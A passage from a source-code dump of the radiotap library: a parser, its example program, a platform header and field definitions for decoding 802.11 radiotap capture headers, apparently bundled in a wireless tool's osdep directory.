3 | 4 | Permission to use, copy, modify, and/or distribute this software for any 5 | purpose with or without fee is hereby granted, provided that the above 6 | copyright notice and this permission notice appear in all copies. 7 | 8 | THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES 9 | WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 10 | MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR 11 | ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES 12 | WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN 13 | ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF 14 | OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 15 | -------------------------------------------------------------------------------- /osdep/radiotap/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | 3 | install: 4 | 5 | uninstall: 6 | 7 | clean: 8 | rm -f *.o 9 | -------------------------------------------------------------------------------- /osdep/radiotap/README: -------------------------------------------------------------------------------- 1 | The files in this directory come from http://www.radiotap.org/ git: 2 | - http://git.sipsolutions.net/radiotap.git/ 3 | - https://github.com/radiotap/radiotap-library 4 | -------------------------------------------------------------------------------- /osdep/radiotap/parse.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include "radiotap_iter.h" 11 | 12 | static int fcshdr = 0; 13 | 14 | static const struct radiotap_align_size align_size_000000_00[] = { 15 | [0] = { .align = 1, .size = 4, }, 16 | [52] = { .align = 1, .size = 4, }, 17 | }; 18 | 19 | static const struct ieee80211_radiotap_namespace vns_array[] = { 20 | { 21 | .oui = 0x000000, 22 | .subns = 0, 23 | .n_bits = sizeof(align_size_000000_00), 24 | .align_size = align_size_000000_00, 25 | }, 26 | }; 27 | 28 | static const struct ieee80211_radiotap_vendor_namespaces vns = { 29 | .ns = vns_array, 30 | .n_ns = sizeof(vns_array)/sizeof(vns_array[0]), 31 | }; 32 | 33 | static void print_radiotap_namespace(struct ieee80211_radiotap_iterator *iter) 34 | { 35 | switch (iter->this_arg_index) { 36 | case IEEE80211_RADIOTAP_TSFT: 37 | printf("\tTSFT: %llu\n", le64toh(*(unsigned long long *)iter->this_arg)); 38 | break; 39 | case IEEE80211_RADIOTAP_FLAGS: 40 | printf("\tflags: %02x\n", *iter->this_arg); 41 | break; 42 | case IEEE80211_RADIOTAP_RATE: 43 | printf("\trate: %lf\n", (double)*iter->this_arg/2); 44 | break; 45 | case IEEE80211_RADIOTAP_CHANNEL: 46 | case IEEE80211_RADIOTAP_FHSS: 47 | case IEEE80211_RADIOTAP_DBM_ANTSIGNAL: 48 | case IEEE80211_RADIOTAP_DBM_ANTNOISE: 49 | case IEEE80211_RADIOTAP_LOCK_QUALITY: 50 | case IEEE80211_RADIOTAP_TX_ATTENUATION: 51 | case IEEE80211_RADIOTAP_DB_TX_ATTENUATION: 52 | case IEEE80211_RADIOTAP_DBM_TX_POWER: 53 | case IEEE80211_RADIOTAP_ANTENNA: 54 | case IEEE80211_RADIOTAP_DB_ANTSIGNAL: 55 | case IEEE80211_RADIOTAP_DB_ANTNOISE: 56 | case IEEE80211_RADIOTAP_TX_FLAGS: 57 | break; 58 | case IEEE80211_RADIOTAP_RX_FLAGS: 59 | if (fcshdr) { 60 | printf("\tFCS in header: %.8x\n", 61 | le32toh(*(uint32_t *)iter->this_arg)); 62 | break; 63 | } 64 | printf("\tRX flags: %#.4x\n", 65 | le16toh(*(uint16_t *)iter->this_arg)); 66 | break; 67 | case IEEE80211_RADIOTAP_RTS_RETRIES: 68 | case IEEE80211_RADIOTAP_DATA_RETRIES: 69 | break; 70 | break; 71 | default: 72 | printf("\tBOGUS DATA\n"); 73 | break; 74 | } 75 | } 76 | 77 | static void print_test_namespace(struct ieee80211_radiotap_iterator *iter) 78 | { 79 | switch (iter->this_arg_index) { 80 | case 0: 81 | case 52: 82 | printf("\t00:00:00-00|%d: %.2x/%.2x/%.2x/%.2x\n", 83 | iter->this_arg_index, 84 | *iter->this_arg, *(iter->this_arg + 1), 85 | *(iter->this_arg + 2), *(iter->this_arg + 3)); 86 | break; 87 | default: 88 | printf("\tBOGUS DATA - vendor ns %d\n", iter->this_arg_index); 89 | break; 90 | } 91 | } 92 | 93 | static const struct radiotap_override overrides[] = { 94 | { .field = 14, .align = 4, .size = 4, } 95 | }; 96 | 97 | int main(int argc, char *argv[]) 98 | { 99 | struct ieee80211_radiotap_iterator iter; 100 | struct stat statbuf; 101 | int fd, err, fnidx = 1, i; 102 | void *data; 103 | 104 | if (argc != 2 && argc != 3) { 105 | fprintf(stderr, "usage: parse [--fcshdr] \n"); 106 | fprintf(stderr, " --fcshdr: read bit 14 as FCS\n"); 107 | return 2; 108 | } 109 | 110 | if (strcmp(argv[1], "--fcshdr") == 0) { 111 | fcshdr = 1; 112 | fnidx++; 113 | } 114 | 115 | fd = open(argv[fnidx], O_RDONLY); 116 | if (fd < 0) { 117 | fprintf(stderr, "cannot open file %s\n", argv[fnidx]); 118 | return 2; 119 | } 120 | 121 | if (fstat(fd, &statbuf)) { 122 | perror("fstat"); 123 | return 2; 124 | } 125 | 126 | data = mmap(NULL, statbuf.st_size, PROT_READ, MAP_SHARED, fd, 0); 127 | 128 | err = ieee80211_radiotap_iterator_init(&iter, data, statbuf.st_size, &vns); 129 | if (err) { 130 | printf("malformed radiotap header (init returns %d)\n", err); 131 | return 3; 132 | } 133 | 134 | if (fcshdr) { 135 | iter.overrides = overrides; 136 | iter.n_overrides = sizeof(overrides)/sizeof(overrides[0]); 137 | } 138 | 139 | while (!(err = ieee80211_radiotap_iterator_next(&iter))) { 140 | if (iter.this_arg_index == IEEE80211_RADIOTAP_VENDOR_NAMESPACE) { 141 | printf("\tvendor NS (%.2x-%.2x-%.2x:%d, %d bytes)\n", 142 | iter.this_arg[0], iter.this_arg[1], 143 | iter.this_arg[2], iter.this_arg[3], 144 | iter.this_arg_size - 6); 145 | for (i = 6; i < iter.this_arg_size; i++) { 146 | if (i % 8 == 6) 147 | printf("\t\t"); 148 | else 149 | printf(" "); 150 | printf("%.2x", iter.this_arg[i]); 151 | } 152 | printf("\n"); 153 | } else if (iter.is_radiotap_ns) 154 | print_radiotap_namespace(&iter); 155 | else if (iter.current_namespace == &vns_array[0]) 156 | print_test_namespace(&iter); 157 | } 158 | 159 | if (err != -ENOENT) { 160 | printf("malformed radiotap data\n"); 161 | return 3; 162 | } 163 | 164 | return 0; 165 | } 166 | -------------------------------------------------------------------------------- /osdep/radiotap/platform.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #ifndef _BSD_SOURCE 4 | #define _BSD_SOURCE 5 | #endif 6 | #if defined(__FreeBSD__) || defined(__DragonFly__) || defined(__NetBSD__) 7 | #include 8 | #elif defined(__APPLE__) 9 | #include 10 | #include 11 | 12 | #define htobe16(x) OSSwapHostToBigInt16(x) 13 | #define htole16(x) OSSwapHostToLittleInt16(x) 14 | #define be16toh(x) OSSwapBigToHostInt16(x) 15 | #define le16toh(x) OSSwapLittleToHostInt16(x) 16 | 17 | #define htobe32(x) OSSwapHostToBigInt32(x) 18 | #define htole32(x) OSSwapHostToLittleInt32(x) 19 | #define be32toh(x) OSSwapBigToHostInt32(x) 20 | #define le32toh(x) OSSwapLittleToHostInt32(x) 21 | 22 | #define htobe64(x) OSSwapHostToBigInt64(x) 23 | #define htole64(x) OSSwapHostToLittleInt64(x) 24 | #define be64toh(x) OSSwapBigToHostInt64(x) 25 | #define le64toh(x) OSSwapLittleToHostInt64(x) 26 | 27 | #define __BIG_ENDIAN BIG_ENDIAN 28 | #define __LITTLE_ENDIAN LITTLE_ENDIAN 29 | #define __BYTE_ORDER BYTE_ORDER 30 | #elif !defined(__sun__) 31 | #include 32 | #endif 33 | 34 | #define le16_to_cpu le16toh 35 | #define le32_to_cpu le32toh 36 | #define get_unaligned(p) \ 37 | ({ \ 38 | struct packed_dummy_struct { \ 39 | typeof(*(p)) __val; \ 40 | } __attribute__((packed)) *__ptr = (void *) (p); \ 41 | \ 42 | __ptr->__val; \ 43 | }) 44 | #define get_unaligned_le16(p) le16_to_cpu(get_unaligned((uint16_t *)(p))) 45 | #define get_unaligned_le32(p) le32_to_cpu(get_unaligned((uint32_t *)(p))) 46 | -------------------------------------------------------------------------------- /osdep/radiotap/radiotap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Radiotap parser 3 | * 4 | * Copyright 2007 Andy Green 5 | * Copyright 2009 Johannes Berg 6 | * 7 | * This program is free software; you can redistribute it and/or modify 8 | * it under the terms of the GNU General Public License version 2 as 9 | * published by the Free Software Foundation. 10 | * 11 | * Alternatively, this software may be distributed under the terms of ISC 12 | * license, see COPYING for more details. 13 | */ 14 | #include "radiotap_iter.h" 15 | #include "platform.h" 16 | 17 | /* function prototypes and related defs are in radiotap_iter.h */ 18 | 19 | static const struct radiotap_align_size rtap_namespace_sizes[] = { 20 | [IEEE80211_RADIOTAP_TSFT] = { .align = 8, .size = 8, }, 21 | [IEEE80211_RADIOTAP_FLAGS] = { .align = 1, .size = 1, }, 22 | [IEEE80211_RADIOTAP_RATE] = { .align = 1, .size = 1, }, 23 | [IEEE80211_RADIOTAP_CHANNEL] = { .align = 2, .size = 4, }, 24 | [IEEE80211_RADIOTAP_FHSS] = { .align = 2, .size = 2, }, 25 | [IEEE80211_RADIOTAP_DBM_ANTSIGNAL] = { .align = 1, .size = 1, }, 26 | [IEEE80211_RADIOTAP_DBM_ANTNOISE] = { .align = 1, .size = 1, }, 27 | [IEEE80211_RADIOTAP_LOCK_QUALITY] = { .align = 2, .size = 2, }, 28 | [IEEE80211_RADIOTAP_TX_ATTENUATION] = { .align = 2, .size = 2, }, 29 | [IEEE80211_RADIOTAP_DB_TX_ATTENUATION] = { .align = 2, .size = 2, }, 30 | [IEEE80211_RADIOTAP_DBM_TX_POWER] = { .align = 1, .size = 1, }, 31 | [IEEE80211_RADIOTAP_ANTENNA] = { .align = 1, .size = 1, }, 32 | [IEEE80211_RADIOTAP_DB_ANTSIGNAL] = { .align = 1, .size = 1, }, 33 | [IEEE80211_RADIOTAP_DB_ANTNOISE] = { .align = 1, .size = 1, }, 34 | [IEEE80211_RADIOTAP_RX_FLAGS] = { .align = 2, .size = 2, }, 35 | [IEEE80211_RADIOTAP_TX_FLAGS] = { .align = 2, .size = 2, }, 36 | [IEEE80211_RADIOTAP_RTS_RETRIES] = { .align = 1, .size = 1, }, 37 | [IEEE80211_RADIOTAP_DATA_RETRIES] = { .align = 1, .size = 1, }, 38 | [IEEE80211_RADIOTAP_MCS] = { .align = 1, .size = 3, }, 39 | [IEEE80211_RADIOTAP_AMPDU_STATUS] = { .align = 4, .size = 8, }, 40 | [IEEE80211_RADIOTAP_VHT] = { .align = 2, .size = 12, }, 41 | [IEEE80211_RADIOTAP_TIMESTAMP] = { .align = 8, .size = 12, }, 42 | /* 43 | * add more here as they are defined in radiotap.h 44 | */ 45 | }; 46 | 47 | static const struct ieee80211_radiotap_namespace radiotap_ns = { 48 | .n_bits = sizeof(rtap_namespace_sizes) / sizeof(rtap_namespace_sizes[0]), 49 | .align_size = rtap_namespace_sizes, 50 | }; 51 | 52 | /** 53 | * ieee80211_radiotap_iterator_init - radiotap parser iterator initialization 54 | * @iterator: radiotap_iterator to initialize 55 | * @radiotap_header: radiotap header to parse 56 | * @max_length: total length we can parse into (eg, whole packet length) 57 | * 58 | * Returns: 0 or a negative error code if there is a problem. 59 | * 60 | * This function initializes an opaque iterator struct which can then 61 | * be passed to ieee80211_radiotap_iterator_next() to visit every radiotap 62 | * argument which is present in the header. It knows about extended 63 | * present headers and handles them. 64 | * 65 | * How to use: 66 | * call __ieee80211_radiotap_iterator_init() to init a semi-opaque iterator 67 | * struct ieee80211_radiotap_iterator (no need to init the struct beforehand) 68 | * checking for a good 0 return code. Then loop calling 69 | * __ieee80211_radiotap_iterator_next()... it returns either 0, 70 | * -ENOENT if there are no more args to parse, or -EINVAL if there is a problem. 71 | * The iterator's @this_arg member points to the start of the argument 72 | * associated with the current argument index that is present, which can be 73 | * found in the iterator's @this_arg_index member. This arg index corresponds 74 | * to the IEEE80211_RADIOTAP_... defines. 75 | * 76 | * Radiotap header length: 77 | * You can find the CPU-endian total radiotap header length in 78 | * iterator->max_length after executing ieee80211_radiotap_iterator_init() 79 | * successfully. 80 | * 81 | * Alignment Gotcha: 82 | * You must take care when dereferencing iterator.this_arg 83 | * for multibyte types... the pointer is not aligned. Use 84 | * get_unaligned((type *)iterator.this_arg) to dereference 85 | * iterator.this_arg for type "type" safely on all arches. 86 | * 87 | * Example code: parse.c 88 | */ 89 | 90 | int ieee80211_radiotap_iterator_init( 91 | struct ieee80211_radiotap_iterator *iterator, 92 | struct ieee80211_radiotap_header *radiotap_header, 93 | int max_length, const struct ieee80211_radiotap_vendor_namespaces *vns) 94 | { 95 | /* must at least have the radiotap header */ 96 | if (max_length < (int)sizeof(struct ieee80211_radiotap_header)) 97 | return -EINVAL; 98 | 99 | /* Linux only supports version 0 radiotap format */ 100 | if (radiotap_header->it_version) 101 | return -EINVAL; 102 | 103 | /* sanity check for allowed length and radiotap length field */ 104 | if (max_length < get_unaligned_le16(&radiotap_header->it_len)) 105 | return -EINVAL; 106 | 107 | iterator->_rtheader = radiotap_header; 108 | iterator->_max_length = get_unaligned_le16(&radiotap_header->it_len); 109 | iterator->_arg_index = 0; 110 | iterator->_bitmap_shifter = get_unaligned_le32(&radiotap_header->it_present); 111 | iterator->_arg = (uint8_t *)radiotap_header + sizeof(*radiotap_header); 112 | iterator->_reset_on_ext = 0; 113 | iterator->_next_bitmap = &radiotap_header->it_present; 114 | iterator->_next_bitmap++; 115 | iterator->_vns = vns; 116 | iterator->current_namespace = &radiotap_ns; 117 | iterator->is_radiotap_ns = 1; 118 | #ifdef RADIOTAP_SUPPORT_OVERRIDES 119 | iterator->n_overrides = 0; 120 | iterator->overrides = NULL; 121 | #endif 122 | 123 | /* find payload start allowing for extended bitmap(s) */ 124 | 125 | if (iterator->_bitmap_shifter & (1<_arg - 127 | (unsigned long)iterator->_rtheader + sizeof(uint32_t) > 128 | (unsigned long)iterator->_max_length) 129 | return -EINVAL; 130 | while (get_unaligned_le32(iterator->_arg) & 131 | (1 << IEEE80211_RADIOTAP_EXT)) { 132 | iterator->_arg += sizeof(uint32_t); 133 | 134 | /* 135 | * check for insanity where the present bitmaps 136 | * keep claiming to extend up to or even beyond the 137 | * stated radiotap header length 138 | */ 139 | 140 | if ((unsigned long)iterator->_arg - 141 | (unsigned long)iterator->_rtheader + 142 | sizeof(uint32_t) > 143 | (unsigned long)iterator->_max_length) 144 | return -EINVAL; 145 | } 146 | 147 | iterator->_arg += sizeof(uint32_t); 148 | 149 | /* 150 | * no need to check again for blowing past stated radiotap 151 | * header length, because ieee80211_radiotap_iterator_next 152 | * checks it before it is dereferenced 153 | */ 154 | } 155 | 156 | iterator->this_arg = iterator->_arg; 157 | 158 | /* we are all initialized happily */ 159 | 160 | return 0; 161 | } 162 | 163 | static void find_ns(struct ieee80211_radiotap_iterator *iterator, 164 | uint32_t oui, uint8_t subns) 165 | { 166 | int i; 167 | 168 | iterator->current_namespace = NULL; 169 | 170 | if (!iterator->_vns) 171 | return; 172 | 173 | for (i = 0; i < iterator->_vns->n_ns; i++) { 174 | if (iterator->_vns->ns[i].oui != oui) 175 | continue; 176 | if (iterator->_vns->ns[i].subns != subns) 177 | continue; 178 | 179 | iterator->current_namespace = &iterator->_vns->ns[i]; 180 | break; 181 | } 182 | } 183 | 184 | #ifdef RADIOTAP_SUPPORT_OVERRIDES 185 | static int find_override(struct ieee80211_radiotap_iterator *iterator, 186 | int *align, int *size) 187 | { 188 | int i; 189 | 190 | if (!iterator->overrides) 191 | return 0; 192 | 193 | for (i = 0; i < iterator->n_overrides; i++) { 194 | if (iterator->_arg_index == iterator->overrides[i].field) { 195 | *align = iterator->overrides[i].align; 196 | *size = iterator->overrides[i].size; 197 | if (!*align) /* erroneous override */ 198 | return 0; 199 | return 1; 200 | } 201 | } 202 | 203 | return 0; 204 | } 205 | #endif 206 | 207 | 208 | /** 209 | * ieee80211_radiotap_iterator_next - return next radiotap parser iterator arg 210 | * @iterator: radiotap_iterator to move to next arg (if any) 211 | * 212 | * Returns: 0 if there is an argument to handle, 213 | * -ENOENT if there are no more args or -EINVAL 214 | * if there is something else wrong. 215 | * 216 | * This function provides the next radiotap arg index (IEEE80211_RADIOTAP_*) 217 | * in @this_arg_index and sets @this_arg to point to the 218 | * payload for the field. It takes care of alignment handling and extended 219 | * present fields. @this_arg can be changed by the caller (eg, 220 | * incremented to move inside a compound argument like 221 | * IEEE80211_RADIOTAP_CHANNEL). The args pointed to are in 222 | * little-endian format whatever the endianness of your CPU. 223 | * 224 | * Alignment Gotcha: 225 | * You must take care when dereferencing iterator.this_arg 226 | * for multibyte types... the pointer is not aligned. Use 227 | * get_unaligned((type *)iterator.this_arg) to dereference 228 | * iterator.this_arg for type "type" safely on all arches. 229 | */ 230 | 231 | int ieee80211_radiotap_iterator_next( 232 | struct ieee80211_radiotap_iterator *iterator) 233 | { 234 | while (1) { 235 | int hit = 0; 236 | int pad, align, size, subns; 237 | uint32_t oui; 238 | 239 | /* if no more EXT bits, that's it */ 240 | if ((iterator->_arg_index % 32) == IEEE80211_RADIOTAP_EXT && 241 | !(iterator->_bitmap_shifter & 1)) 242 | return -ENOENT; 243 | 244 | if (!(iterator->_bitmap_shifter & 1)) 245 | goto next_entry; /* arg not present */ 246 | 247 | /* get alignment/size of data */ 248 | switch (iterator->_arg_index % 32) { 249 | case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: 250 | case IEEE80211_RADIOTAP_EXT: 251 | align = 1; 252 | size = 0; 253 | break; 254 | case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: 255 | align = 2; 256 | size = 6; 257 | break; 258 | default: 259 | #ifdef RADIOTAP_SUPPORT_OVERRIDES 260 | if (find_override(iterator, &align, &size)) { 261 | /* all set */ 262 | } else 263 | #endif 264 | if (!iterator->current_namespace || 265 | iterator->_arg_index >= iterator->current_namespace->n_bits) { 266 | if (iterator->current_namespace == &radiotap_ns) 267 | return -ENOENT; 268 | align = 0; 269 | } else { 270 | align = iterator->current_namespace->align_size[iterator->_arg_index].align; 271 | size = iterator->current_namespace->align_size[iterator->_arg_index].size; 272 | } 273 | if (!align) { 274 | /* skip all subsequent data */ 275 | iterator->_arg = iterator->_next_ns_data; 276 | /* give up on this namespace */ 277 | iterator->current_namespace = NULL; 278 | goto next_entry; 279 | } 280 | break; 281 | } 282 | 283 | /* 284 | * arg is present, account for alignment padding 285 | * 286 | * Note that these alignments are relative to the start 287 | * of the radiotap header. There is no guarantee 288 | * that the radiotap header itself is aligned on any 289 | * kind of boundary. 290 | * 291 | * The above is why get_unaligned() is used to dereference 292 | * multibyte elements from the radiotap area. 293 | */ 294 | 295 | pad = ((unsigned long)iterator->_arg - 296 | (unsigned long)iterator->_rtheader) & (align - 1); 297 | 298 | if (pad) 299 | iterator->_arg += align - pad; 300 | 301 | if (iterator->_arg_index % 32 == IEEE80211_RADIOTAP_VENDOR_NAMESPACE) { 302 | int vnslen; 303 | 304 | if ((unsigned long)iterator->_arg + size - 305 | (unsigned long)iterator->_rtheader > 306 | (unsigned long)iterator->_max_length) 307 | return -EINVAL; 308 | 309 | oui = (*iterator->_arg << 16) | 310 | (*(iterator->_arg + 1) << 8) | 311 | *(iterator->_arg + 2); 312 | subns = *(iterator->_arg + 3); 313 | 314 | find_ns(iterator, oui, subns); 315 | 316 | vnslen = get_unaligned_le16(iterator->_arg + 4); 317 | iterator->_next_ns_data = iterator->_arg + size + vnslen; 318 | if (!iterator->current_namespace) 319 | size += vnslen; 320 | } 321 | 322 | /* 323 | * this is what we will return to user, but we need to 324 | * move on first so next call has something fresh to test 325 | */ 326 | iterator->this_arg_index = iterator->_arg_index; 327 | iterator->this_arg = iterator->_arg; 328 | iterator->this_arg_size = size; 329 | 330 | /* internally move on the size of this arg */ 331 | iterator->_arg += size; 332 | 333 | /* 334 | * check for insanity where we are given a bitmap that 335 | * claims to have more arg content than the length of the 336 | * radiotap section. We will normally end up equalling this 337 | * max_length on the last arg, never exceeding it. 338 | */ 339 | 340 | if ((unsigned long)iterator->_arg - 341 | (unsigned long)iterator->_rtheader > 342 | (unsigned long)iterator->_max_length) 343 | return -EINVAL; 344 | 345 | /* these special ones are valid in each bitmap word */ 346 | switch (iterator->_arg_index % 32) { 347 | case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: 348 | iterator->_reset_on_ext = 1; 349 | 350 | iterator->is_radiotap_ns = 0; 351 | /* 352 | * If parser didn't register this vendor 353 | * namespace with us, allow it to show it 354 | * as 'raw. Do do that, set argument index 355 | * to vendor namespace. 356 | */ 357 | iterator->this_arg_index = 358 | IEEE80211_RADIOTAP_VENDOR_NAMESPACE; 359 | if (!iterator->current_namespace) 360 | hit = 1; 361 | goto next_entry; 362 | case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: 363 | iterator->_reset_on_ext = 1; 364 | iterator->current_namespace = &radiotap_ns; 365 | iterator->is_radiotap_ns = 1; 366 | goto next_entry; 367 | case IEEE80211_RADIOTAP_EXT: 368 | /* 369 | * bit 31 was set, there is more 370 | * -- move to next u32 bitmap 371 | */ 372 | iterator->_bitmap_shifter = 373 | get_unaligned_le32(iterator->_next_bitmap); 374 | iterator->_next_bitmap++; 375 | if (iterator->_reset_on_ext) 376 | iterator->_arg_index = 0; 377 | else 378 | iterator->_arg_index++; 379 | iterator->_reset_on_ext = 0; 380 | break; 381 | default: 382 | /* we've got a hit! */ 383 | hit = 1; 384 | next_entry: 385 | iterator->_bitmap_shifter >>= 1; 386 | iterator->_arg_index++; 387 | } 388 | 389 | /* if we found a valid arg earlier, return it now */ 390 | if (hit) 391 | return 0; 392 | } 393 | } 394 | -------------------------------------------------------------------------------- /osdep/radiotap/radiotap.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2017 Intel Deutschland GmbH 3 | * 4 | * Permission to use, copy, modify, and/or distribute this software for any 5 | * purpose with or without fee is hereby granted, provided that the above 6 | * copyright notice and this permission notice appear in all copies. 7 | * 8 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES 9 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 10 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR 11 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES 12 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN 13 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF 14 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 15 | */ 16 | #ifndef __RADIOTAP_H 17 | #define __RADIOTAP_H 18 | 19 | /** 20 | * struct ieee82011_radiotap_header - base radiotap header 21 | */ 22 | struct ieee80211_radiotap_header { 23 | /** 24 | * @it_version: radiotap version, always 0 25 | */ 26 | uint8_t it_version; 27 | 28 | /** 29 | * @it_pad: padding (or alignment) 30 | */ 31 | uint8_t it_pad; 32 | 33 | /** 34 | * @it_len: overall radiotap header length 35 | */ 36 | uint16_t it_len; 37 | 38 | /** 39 | * @it_present: (first) present word 40 | */ 41 | uint32_t it_present; 42 | } __packed; 43 | 44 | /* version is always 0 */ 45 | #define PKTHDR_RADIOTAP_VERSION 0 46 | 47 | /* see the radiotap website for the descriptions */ 48 | enum ieee80211_radiotap_presence { 49 | IEEE80211_RADIOTAP_TSFT = 0, 50 | IEEE80211_RADIOTAP_FLAGS = 1, 51 | IEEE80211_RADIOTAP_RATE = 2, 52 | IEEE80211_RADIOTAP_CHANNEL = 3, 53 | IEEE80211_RADIOTAP_FHSS = 4, 54 | IEEE80211_RADIOTAP_DBM_ANTSIGNAL = 5, 55 | IEEE80211_RADIOTAP_DBM_ANTNOISE = 6, 56 | IEEE80211_RADIOTAP_LOCK_QUALITY = 7, 57 | IEEE80211_RADIOTAP_TX_ATTENUATION = 8, 58 | IEEE80211_RADIOTAP_DB_TX_ATTENUATION = 9, 59 | IEEE80211_RADIOTAP_DBM_TX_POWER = 10, 60 | IEEE80211_RADIOTAP_ANTENNA = 11, 61 | IEEE80211_RADIOTAP_DB_ANTSIGNAL = 12, 62 | IEEE80211_RADIOTAP_DB_ANTNOISE = 13, 63 | IEEE80211_RADIOTAP_RX_FLAGS = 14, 64 | IEEE80211_RADIOTAP_TX_FLAGS = 15, 65 | IEEE80211_RADIOTAP_RTS_RETRIES = 16, 66 | IEEE80211_RADIOTAP_DATA_RETRIES = 17, 67 | /* 18 is XChannel, but it's not defined yet */ 68 | IEEE80211_RADIOTAP_MCS = 19, 69 | IEEE80211_RADIOTAP_AMPDU_STATUS = 20, 70 | IEEE80211_RADIOTAP_VHT = 21, 71 | IEEE80211_RADIOTAP_TIMESTAMP = 22, 72 | 73 | /* valid in every it_present bitmap, even vendor namespaces */ 74 | IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE = 29, 75 | IEEE80211_RADIOTAP_VENDOR_NAMESPACE = 30, 76 | IEEE80211_RADIOTAP_EXT = 31 77 | }; 78 | 79 | /* for IEEE80211_RADIOTAP_FLAGS */ 80 | enum ieee80211_radiotap_flags { 81 | IEEE80211_RADIOTAP_F_CFP = 0x01, 82 | IEEE80211_RADIOTAP_F_SHORTPRE = 0x02, 83 | IEEE80211_RADIOTAP_F_WEP = 0x04, 84 | IEEE80211_RADIOTAP_F_FRAG = 0x08, 85 | IEEE80211_RADIOTAP_F_FCS = 0x10, 86 | IEEE80211_RADIOTAP_F_DATAPAD = 0x20, 87 | IEEE80211_RADIOTAP_F_BADFCS = 0x40, 88 | }; 89 | 90 | /* for IEEE80211_RADIOTAP_CHANNEL */ 91 | enum ieee80211_radiotap_channel_flags { 92 | IEEE80211_CHAN_CCK = 0x0020, 93 | IEEE80211_CHAN_OFDM = 0x0040, 94 | IEEE80211_CHAN_2GHZ = 0x0080, 95 | IEEE80211_CHAN_5GHZ = 0x0100, 96 | IEEE80211_CHAN_DYN = 0x0400, 97 | IEEE80211_CHAN_HALF = 0x4000, 98 | IEEE80211_CHAN_QUARTER = 0x8000, 99 | }; 100 | 101 | /* for IEEE80211_RADIOTAP_RX_FLAGS */ 102 | enum ieee80211_radiotap_rx_flags { 103 | IEEE80211_RADIOTAP_F_RX_BADPLCP = 0x0002, 104 | }; 105 | 106 | /* for IEEE80211_RADIOTAP_TX_FLAGS */ 107 | enum ieee80211_radiotap_tx_flags { 108 | IEEE80211_RADIOTAP_F_TX_FAIL = 0x0001, 109 | IEEE80211_RADIOTAP_F_TX_CTS = 0x0002, 110 | IEEE80211_RADIOTAP_F_TX_RTS = 0x0004, 111 | IEEE80211_RADIOTAP_F_TX_NOACK = 0x0008, 112 | }; 113 | 114 | /* for IEEE80211_RADIOTAP_MCS "have" flags */ 115 | enum ieee80211_radiotap_mcs_have { 116 | IEEE80211_RADIOTAP_MCS_HAVE_BW = 0x01, 117 | IEEE80211_RADIOTAP_MCS_HAVE_MCS = 0x02, 118 | IEEE80211_RADIOTAP_MCS_HAVE_GI = 0x04, 119 | IEEE80211_RADIOTAP_MCS_HAVE_FMT = 0x08, 120 | IEEE80211_RADIOTAP_MCS_HAVE_FEC = 0x10, 121 | IEEE80211_RADIOTAP_MCS_HAVE_STBC = 0x20, 122 | }; 123 | 124 | enum ieee80211_radiotap_mcs_flags { 125 | IEEE80211_RADIOTAP_MCS_BW_MASK = 0x03, 126 | IEEE80211_RADIOTAP_MCS_BW_20 = 0, 127 | IEEE80211_RADIOTAP_MCS_BW_40 = 1, 128 | IEEE80211_RADIOTAP_MCS_BW_20L = 2, 129 | IEEE80211_RADIOTAP_MCS_BW_20U = 3, 130 | 131 | IEEE80211_RADIOTAP_MCS_SGI = 0x04, 132 | IEEE80211_RADIOTAP_MCS_FMT_GF = 0x08, 133 | IEEE80211_RADIOTAP_MCS_FEC_LDPC = 0x10, 134 | IEEE80211_RADIOTAP_MCS_STBC_MASK = 0x60, 135 | IEEE80211_RADIOTAP_MCS_STBC_1 = 1, 136 | IEEE80211_RADIOTAP_MCS_STBC_2 = 2, 137 | IEEE80211_RADIOTAP_MCS_STBC_3 = 3, 138 | IEEE80211_RADIOTAP_MCS_STBC_SHIFT = 5, 139 | }; 140 | 141 | /* for IEEE80211_RADIOTAP_AMPDU_STATUS */ 142 | enum ieee80211_radiotap_ampdu_flags { 143 | IEEE80211_RADIOTAP_AMPDU_REPORT_ZEROLEN = 0x0001, 144 | IEEE80211_RADIOTAP_AMPDU_IS_ZEROLEN = 0x0002, 145 | IEEE80211_RADIOTAP_AMPDU_LAST_KNOWN = 0x0004, 146 | IEEE80211_RADIOTAP_AMPDU_IS_LAST = 0x0008, 147 | IEEE80211_RADIOTAP_AMPDU_DELIM_CRC_ERR = 0x0010, 148 | IEEE80211_RADIOTAP_AMPDU_DELIM_CRC_KNOWN = 0x0020, 149 | }; 150 | 151 | /* for IEEE80211_RADIOTAP_VHT */ 152 | enum ieee80211_radiotap_vht_known { 153 | IEEE80211_RADIOTAP_VHT_KNOWN_STBC = 0x0001, 154 | IEEE80211_RADIOTAP_VHT_KNOWN_TXOP_PS_NA = 0x0002, 155 | IEEE80211_RADIOTAP_VHT_KNOWN_GI = 0x0004, 